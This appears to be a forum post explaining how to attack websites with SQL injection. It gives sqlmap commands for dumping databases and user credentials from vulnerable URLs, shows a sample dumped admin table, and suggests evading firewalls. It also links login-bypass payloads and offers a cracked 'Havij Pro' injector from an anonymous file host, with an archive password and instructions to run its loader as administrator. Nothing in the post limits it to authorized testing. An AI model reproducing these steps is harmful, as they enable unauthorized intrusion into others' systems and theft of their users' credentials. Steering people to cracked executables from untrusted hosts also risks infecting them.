First install sqlmap, on linux sudo apt install sqlmap, on windows download cmder (https://github.com/cmderdev/cmder/releas.../cmder.zip) and execute the same command.
If you dont want to bother with arguments like --risk or --level and much of others, run sqlmap only with sqlmap -u url --batch, that will automatize it, you can also use --random-agent against some firewall protection.
If you want to go straight for dumping databases use these arguments:
sqlmap -u url --dbs (this will show all databases if vulnerable)
sqlmap -u url -D selected_database (this will pick up a database)
sqlmap -u url -T selected_user (this will pick up a user from the database and show his username and password)
The result should look like this:
Code:
Code:
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash | name | email | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1 | 5DIpzzDHFOwnCvPonu | admin | <blank> | <blank> | 3 | <blank> | <blank> |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
How to bypass login panel using sql injection techniques:
If you want to exploit login pages/admin panels, you need a sql payload,
Theres list of them and explained: http://www.securityidiots.com/Web-Pentes...ction.html
Theres explained what to 'paste' into username and password field, Im currently making a tool that should automatize it.
Havij pro free download, automatic sql injector v1.17(latest):
Havij automatic sql injector .exe for windows:
https://anonfiles.com/I5Pbkbvdn2/HavijPro_v1.17_zip
password: r3d0x
Put the loader in folder of installed havij and launch it as an admin, then click register without typing anything into that fileds, it will login you.
VT: https://www.virustotal.com/gui/file...adc077d79d2d6d3327009fdb7469f24f79f/detection